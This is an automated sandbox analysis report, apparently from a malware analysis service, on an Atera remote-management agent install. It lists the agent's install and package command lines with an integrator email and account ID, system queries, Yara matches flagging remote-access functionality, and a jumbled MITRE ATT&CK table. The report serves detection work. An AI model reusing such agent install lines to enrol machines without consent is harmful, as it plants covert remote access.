                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "209f7be2-df48-4eff-a817-c4dc20cdcd81" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000kso2piab
                              Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "c:\program files (x86)\atera networks\ateraagent\ateraagent.exe" /i /integratorlogin="paul.fraxom@yzistanbul.me" /companyid="1" /integratorloginui="" /companyidui="" /folderid="" /accountid="001q300000kso2piab" /agentid="2094f497-2e94-42f0-b27c-add7e377a9d2"Jump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "6be74508-e40c-4e94-a6e8-129eac28e456" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000kso2piab
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "76e20853-e7dd-41ac-a560-28cfe22d3466" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000kso2piab
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "c:\program files (x86)\atera networks\ateraagent\packages\agentpackageagentinformation\agentpackageagentinformation.exe" 2094f497-2e94-42f0-b27c-add7e377a9d2 "209f7be2-df48-4eff-a817-c4dc20cdcd81" agent-api.atera.com/production 443 or8ixli90mf "minimalidentification" 001q300000kso2piab
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI6A36.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI7013.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI7013.tmp-\Newtonsoft.Json.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI87B3.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Pubnub.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Newtonsoft.Json.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIA9F5.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Installer\MSIA9F5.tmp-\Newtonsoft.Json.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Newtonsoft.Json.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll VolumeInformation
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                              Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 Blob

                              Remote Access Functionality

                              barindex
                              Yara detected AteraAgent
                              Source: Yara matchFile source: 13.0.AteraAgent.exe.158ec7a0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 19.2.AgentPackageAgentInformation.exe.2ac50640000.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 19.0.AgentPackageAgentInformation.exe.2ac4fe20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000004.00000003.1382870012.0000000004726000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2637180822.0000018896E70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1539508523.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2637942103.00000188970C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.2390295578.0000020EC378B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2229922038.000002C453663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2637180822.0000018896E78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1539023783.00007FFAAB4E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2643291786.00000188AFF9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000000.1743436849.000002AC4FE22000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1532838570.000001588008C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2638383365.00000188979FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.2391164954.0000020EC40C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2229051950.000002C452CC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2638383365.0000018897FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000000.1477735807.00000158EC7A2000.00000002.00000001.01000000.00000010.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2638383365.00000188979BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1532838570.0000015880135000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000002.1777176033.000002AC50642000.00000002.00000001.01000000.0000001A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000002.1776963647.000002AC50120000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2638383365.0000018897F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2232515933.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000003.1394167510.00000000049D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000002.1776434069.000002AC4FF4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.2391164954.0000020EC410F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2229922038.000002C453673000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1532838570.00000158800B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2229051950.000002C452D01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.2390676105.0000020EC3800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000003.1454680020.0000000004119000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000012.00000003.1543865163.00000000044B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.2390975900.0000020EC39E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1532838570.0000015880089000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1533766772.00000158EC911000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2638383365.0000018897B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1537471670.00000158EF00F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.2390295578.0000020EC37AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.1451460309.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2638383365.00000188978D7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.2391164954.0000020EC40D3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.2391164954.0000020EC4051000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1532838570.0000015880166000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1532838570.000001588017C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2643291786.00000188B003D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2229922038.000002C4536AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2229051950.000002C452CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2637091889.0000018896E20000.00000004.00000020.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1533766772.00000158EC8F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1534928967.00000158ECC70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1533766772.00000158EC97D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.2397247663.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000012.00000002.1601257080.00000000047E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.2390230194.0000020EC3770000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000002.1780162359.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1532838570.0000015880132000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2634811846.0000004329CF5000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000002.1776434069.000002AC4FF00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2638383365.000001889776E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.2390295578.0000020EC37B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1535130390.00000158EED07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000005.00000002.1451460309.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000012.00000002.1601257080.0000000004887000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2229922038.000002C453637000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000002.1776434069.000002AC4FF09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2637180822.0000018896EAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2654327651.00007FFB23AF0000.00000004.00000001.01000000.00000013.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2229922038.000002C4535F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1534693528.00000158ECB50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2638383365.0000018897B33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1532838570.00000158800BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2229684773.000002C452F10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1532838570.00000158800B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2638383365.0000018897944000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2230821396.000002C46BD60000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2229051950.000002C452CFD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2646161990.00000188B0344000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2638383365.00000188979E8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000002.1776434069.000002AC4FEC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1535130390.00000158EED7B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2638383365.0000018897806000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000002.1777274260.000002AC50773000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2637180822.0000018896EF4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1532838570.00000158800C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1535130390.00000158EEC90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1533766772.00000158EC8D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1532838570.0000015880001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000002.1777274260.000002AC50783000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000017.00000002.2229051950.000002C452D4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000019.00000002.2391164954.0000020EC4097000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000013.00000002.1777274260.000002AC50701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000F.00000002.2638383365.0000018897701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7832, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7892, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 8000, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 7400, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: AteraAgent.exe PID: 6216, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4308, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 5852, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 7332, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: AgentPackageAgentInformation.exe PID: 6992, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Windows\Temp\~DFE1D8FD4611557514.TMP, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Temp\~DFD5E723F7AA2005AD.TMP, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Temp\~DFB8E4C2B6BEE736E9.TMP, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Temp\~DF9340E6CB357EA061.TMP, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Temp\~DFC5872F544B03548F.TMP, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI7013.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI87B3.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\System32\InstallUtil.InstallLog, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Temp\~DF975FD2E2CDD5436E.TMP, type: DROPPED
                              Source: Yara matchFile source: C:\Config.Msi\6c6862.rbs, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\Atera.AgentPackage.Common.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI6A36.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSIA9F5.tmp-\AlphaControlAgentInstallation.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI8A82.tmp, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Replication Through Removable Media                              		121
                              Windows Management Instrumentation                              		1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		21
                              Disable or Modify Tools                              		OS Credential Dumping11
                              Peripheral Device Discovery                              		Remote Services1
                              Archive Collected Data                              		1
                              Ingress Tool Transfer                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Command and Scripting Interpreter                              		21
                              Windows Service                              		21
                              Windows Service                              		21
                              Obfuscated Files or Information                              		LSASS Memory2
                              File and Directory Discovery                              		Remote Desktop ProtocolData from Removable Media11
                              Encrypted Channel                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts11
                              Service Execution                              		Logon Script (Windows)11
                              Process Injection                              		1
                              Timestomp                              		Security Account Manager24
                              System Information Discovery                              		SMB/Windows Admin SharesData from Network Shared Drive2
                              Non-Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                              DLL Side-Loading                              		NTDS1
                              Query Registry                              		Distributed Component Object ModelInput Capture3
                              Application Layer Protocol                              		Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              File Deletion                              		LSA Secrets211
                              Security Software Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts122
                              Masquerading                              		Cached Domain Credentials1
                              Process Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              Modify Registry                              		DCSync141
                              Virtualization/Sandbox Evasion                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                              Virtualization/Sandbox Evasion                              		Proc Filesystem1
                              Application Window Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                              Process Injection                              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Rundll32                              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
